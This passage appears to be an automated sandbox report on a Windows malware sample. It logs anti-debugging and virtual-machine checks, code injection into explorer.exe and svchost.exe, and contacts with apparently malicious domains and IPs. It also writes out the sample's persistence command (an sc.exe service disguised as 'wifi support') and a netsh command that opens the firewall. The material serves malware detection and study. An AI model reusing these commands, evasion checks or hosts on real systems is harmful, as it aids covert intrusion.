                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe TID: 5712 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4972 Thread sleep count: 44 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4972 Thread sleep time: -44000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe TID: 5800 Thread sleep count: 66 > 30
                      Source: C:\Users\user\AppData\Local\Temp\4187.exe TID: 6920 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 581
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 385
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 373
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4BED.exe
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\sqlite3[1].dll
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened / queried: VBoxGuest
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Code function: 19_2_00CB428C sldt word ptr [eax]
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                      Source: svchost.exe, 00000004.00000002.541068406.000002024F62A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW ?
                      Source: explorer.exe, 00000003.00000000.260652966.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
                      Source: CBA.exe Binary or memory string: GT2EIAjAGm5qklVOONCYigE5tZUjotUEjRY/2opRQtiq+6wTeNE/rq1pj8njZK0Q/UO/1ciYEsPM0m6Za/DqcZpEMR9PAn3HlJ7abKBdphlyhgfStmoYllm2nj4zb04la3
                      Source: explorer.exe, 00000003.00000000.282298722.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.256022995.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
                      Source: svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
                      Source: 2757.exe, 00000027.00000002.628690320.000000002F994000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000004.00000002.592027027.0000020254C4C000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.597913891.0000000002734000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.593363171.000000000270F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000003.00000000.281048957.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                      Source: explorer.exe, 00000003.00000000.260720434.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                      Source: explorer.exe, 00000003.00000000.283347822.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                      Source: explorer.exe, 00000003.00000000.260720434.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                      Source: 4187.exe, 0000002A.00000002.597913891.0000000002734000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`
                      Source: svchost.exe, 00000005.00000002.538342411.00000175AA83E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.517850070.000001FB83829000.00000004.00000001.sdmp, svchost.exe, 00000022.00000002.559905618.0000000003200000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe System information queried: ModuleInformation

                      Anti Debugging:

                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Open window title or class name: windbgframeclass
                      Hides threads from debuggers
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Thread information set: HideFromDebugger
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\nkINykHreE.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\haifbcd System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_004309A0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_00540042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\haifbcd Code function: 13_2_00470042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\115B.exe Code function: 14_2_00470042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\115B.exe Code function: 14_2_006C5C0F push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Code function: 17_2_007877AB push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_0054092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00540D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00773572 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Code function: 31_2_0054092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Code function: 31_2_00540D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\haifbcd Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\scifbcd Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugFlags
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe Process queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe File opened: SICE
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_00426900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_0041C6FF SetLastError,GetProfileStringW,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryA,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoA,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringW,GetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 1_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_00426900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_004229B0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_004222D0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_004327E0 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Code function: 31_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 194.87.235.183 443
                      Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 40.93.207.1 25
                      Source: C:\Windows\explorer.exe Domain query: bitly.com
                      Source: C:\Windows\SysWOW64\svchost.exe Domain query: patmushta.info
                      Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe Network Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exe Domain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe Domain query: f0616068.xsph.ru
                      Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exe Domain query: unic11m.top
                      Source: C:\Windows\explorer.exe Domain query: vk.com
                      Source: C:\Windows\explorer.exe Domain query: www.mediafire.com
                      Source: C:\Windows\explorer.exe Domain query: natribu.org
                      Source: C:\Windows\explorer.exe Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe Domain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe Domain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exe Domain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exe Domain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exe Domain query: goo.su
                      Source: C:\Windows\explorer.exe Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exe File created: haifbcd.3.dr
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\haifbcd Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\haifbcd Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\scifbcd Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\scifbcd Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2BB0000 protect: page execute and read and write
                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Memory written: C:\Users\user\Desktop\nkINykHreE.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\haifbcd Memory written: C:\Users\user\AppData\Roaming\haifbcd base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\115B.exe Memory written: C:\Users\user\AppData\Local\Temp\115B.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Memory written: C:\Users\user\AppData\Local\Temp\CBA.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BB0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Thread created: C:\Windows\explorer.exe EIP: 3A61930
                      Source: C:\Users\user\AppData\Roaming\haifbcd Thread created: unknown EIP: 5DD1930
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Thread created: unknown EIP: 6DB1A40
                      Source: C:\Users\user\AppData\Roaming\scifbcd Thread created: unknown EIP: 7701A40
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BB0000
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C71008
                      .NET source code references suspicious native API functions
                      Source: CBA.exe.3.dr, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.1.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.0.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.3.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.2.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.2.CBA.exe.cb0000.0.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 33.0.CBA.exe.f90000.2.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.f90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 33.0.CBA.exe.400000.4.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.2.CBA.exe.400000.0.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.f90000.7.unpack, lennahCtneilCIledoMecivreSmetsyS22062.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.f90000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 33.0.CBA.exe.400000.12.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.400000.8.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Process created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
                      Source: C:\Users\user\AppData\Roaming\haifbcd Process created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exe Process created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start dbgxuqbr
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exe Process created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: 18_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000003.00000000.285107992.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.260756082.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.275109089.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.290404314.00000000089FF000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000003.00000000.255386950.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.266495197.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.280909928.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
